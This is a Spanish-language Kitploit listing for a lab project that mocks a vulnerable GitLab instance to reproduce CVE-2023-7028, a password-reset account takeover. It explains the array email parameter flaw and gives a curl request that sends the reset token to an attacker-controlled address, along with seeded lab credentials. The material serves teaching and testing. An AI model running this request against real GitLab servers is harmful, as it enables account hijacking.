Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GitLab-CVE-2023-7028 — Instancia simulada de GitLab vulnerable que reproduce el secuestro de restablecimiento de contraseña CVE-2023-7028. Demuestra la explotación del parámetro de correo electrónico basado en arrays y la toma de control de cuentas. Solo para uso educativo en laboratorio. | Kitploit
Herramientas/GitHubGitHub/feartheploto/gitlab-cve-2023-7028
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubfeartheploto/gitlab-cve-2023-7028

GitLab-CVE-2023-7028

Instancia simulada de GitLab vulnerable que reproduce el secuestro de restablecimiento de contraseña CVE-2023-7028. Demuestra la explotación del parámetro de correo electrónico basado en arrays y la toma de control de cuentas. Solo para uso educativo en laboratorio.

Ver Repositorio
7hace 20 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GitLab CVE-2023-7028 — Mock 16.6.0 (solo host)

CVE-2023-7028 (CVSS 10.0): POST /users/password aceptaba el array user[email][] — el servidor encontraba al usuario por email[0] pero enviaba el mismo token de restablecimiento a todas las direcciones → un atacante con [email protected] secuestra [email protected]. Afectados: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Este mock reproduce el flujo vulnerable de la 16.6.0 (base de datos JSON, sin SMTP).

Ejecutar

npm install && npm start → http://127.0.0.1:3000 (o PORT=3001 npm start; reintentos automáticos si está ocupado; solo localhost). Datos precargados: [email protected]/s3cur3P@ss!, , en .

[email protected]/BobSecure1!
[email protected]/5iveL!fe
data/users.json

Reproducir

curl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]" Comprueba http://127.0.0.1:3000/mailbox o /api/emails — ambos reciben el mismo token. Abre .../users/password/edit?reset_password_token=TOKEN para tomar el control. Normal: user[email][email protected] → un correo. El buzón muestra todos los correos; nada sale del host. MIT — solo laboratorio, no exponer.

Descargar herramienta